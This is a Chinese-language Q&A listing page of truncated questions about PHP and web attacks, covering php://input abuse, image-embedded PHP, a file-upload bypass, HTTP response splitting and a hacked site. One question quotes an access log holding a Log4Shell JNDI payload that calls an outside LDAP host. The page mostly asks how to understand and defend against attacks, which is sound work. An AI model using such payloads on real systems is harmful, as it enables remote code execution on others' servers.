我的网站刚刚被一个攻击者轰炸,攻击者试图将"php://input“传递给他们能想到的任何GET/POST变量。如果这是试图利用一个漏洞,我不知道它。该用户可能试图利用什么?
浏览 2提问于2010-12-15得票数 10
回答已采纳
在我看来,以下来自php网页的代码可能会被利用。$path = substr($_SERVER['REQUEST_URI'], 0, strpos($_SERVER;
在请求uri中发送php语法的攻击者可以利用以下语句之一进行
浏览 1提问于2014-08-12得票数 1
回答已采纳
假设我们有一个login.php文件,如下所示:$username = $_POST['username'];// check fields and if they were>
黑客可以利用php攻击对简单的XSS代码进行攻击吗?
浏览 4提问于2015-08-24得票数 0
回答已采纳
2回答
需要帮助利用php脚本的挑战漏洞
、、、、
我试图利用Wechall.net的“停止我们”的php脚本中的一个漏洞进行攻击,我不确定,但我想我找到了这个漏洞,但现在我不知道如何利用它。我在PHP.net上做了一些研究,我相信用户可以中止/关闭连接,然后脚本的进程就会终止,因为没有设置ignore_user_abort,所以在购买了以下脚本中的“域”之后,攻击者就可以关闭连接,而平衡也不会减少下面是挑战:易损代码的易受攻击代码
如何在特定时间关闭/中止连接?(竞赛窗口)
浏览 0提问于2016-05-12得票数 0
回答已采纳
有人警告我,PHP的$_SERVER['HTTP_REFERER']是网站常见的攻击载体。攻击者利用此功能的方式有哪些?我怎么才能防范他们?
浏览 0提问于2014-05-20得票数 4
我读到一篇php文章,攻击者可以在GIF图片中间插入PHP代码,然后将这个“邪恶”图片上传到网站上,然后网站可能会被安全漏洞利用任何朋友都可以给出一个想法来抵抗这种类型的攻击。
浏览 11提问于2012-10-12得票数 1
回答已采纳
2回答
在消除脆弱性方面:in PHP我可以看到这可能是一个本地问题,但攻击者如何可能远程利用这一漏洞?确切漏洞:http://www.securityfocus.com/bid/47950
浏览 0提问于2012-04-03得票数 2
回答已采纳
我在magento2中的应用。我查了我的访问日志。访问日志中的多个条目如下所示。我不确定是否在我的代码中注入了log4j,因为每个请求都是302。请查看下面的访问日志示例。
"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D HTTP/1.1" 302 275 "${jndi:ldap://167.99.115.242:1389/Binary}" "${jndi:ldap://167.99.115.242:1389/Binary}
浏览 0提问于2021-12-20得票数 1
回答已采纳
1回答
我试图复制这个漏洞:
根据解释,可以绕过Wordpress插件中的检查,在php扩展后添加一个特殊的char。我正在尝试攻击,文件上传时名为shell.php<special_char>,包含一个简单的php代码<?php echo "poc"; ?>。
然后,我应该在<target>/..../shell
浏览 0提问于2020-12-22得票数 1
您知道任何受最近 ImageMagick攻击影响的包含管理系统或其他应用程序吗?(我已经使用了在Linux上提供的转换工具)
浏览 0提问于2016-05-30得票数 0
回答已采纳
2回答
myClass.php // validate input and determine the appropriatehelper::removeFolder($folder); static function removeFolder($folder) {现在,我正在使用这个检查调用的类名
我特别关注攻击者
浏览 5提问于2015-02-10得票数 0
回答已采纳
利用HTTP请求本身中的向量可以攻击web应用程序的方式多种多样。HTTP响应拆分等攻击利用修改请求标头本身来攻击易受攻击的应用程序。
浏览 10提问于2017-01-24得票数 2
我很难找出攻击矢量/攻击面/漏洞和利用之间的区别。根据维基百科(漏洞)因此,攻击表面和漏洞似乎是IT安全上下文中的同义词(?
浏览 0提问于2015-06-04得票数 25
回答已采纳
在第二次攻击时,所有表都被清除,一些php文件的代码被更改:/删除已创建的所有非系统Ftp帐户检查脚本中的任何头注入攻击、Sql注入攻击、跨站点脚本攻击等,以及您的php.ini文件设置。
如果您的脚本被感染,您可能希望回滚到您的帐户的上一次良好快照备份。我试图尽我所能做到所有这些,特别是关于“头注入攻击、Sql注入攻击</e
浏览 0提问于2010-02-23得票数 1
我正试图了解更多关于PHP ()利用的知识,并遇到了这样的情况:
$cmd = "echo \"" .除了XSS错误之外,此代码段是否易受攻击?这会被滥用到PHP代码注入中吗?
浏览 0提问于2018-01-10得票数 7
回答已采纳
1回答
随着关键的网络物理系统(CPS)在我们的日常生活(汽车、地铁、无人机、船舶.)的指数上升,攻击者如何能够利用非恶意的故障(例如,由于组件老化或由于成本限制或不称职,可能导致内存膨胀/泄漏,数据碎片.)来制造恶意的错误我正在试图找到一些对我的问题有利的消息来源,即攻击者是否有可能等待非恶意错误发生,以便利用它们发起攻击?如果在高保证部分的路径上存在低保证组件,容易发生故障,攻击者是否有可能利用低保证组件的自然故障来突破高保证组件?
我发现的主要来源是故障
浏览 0提问于2018-11-24得票数 2
云服务器
ICP备案
对象存储
云点播
智聆口语评测
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号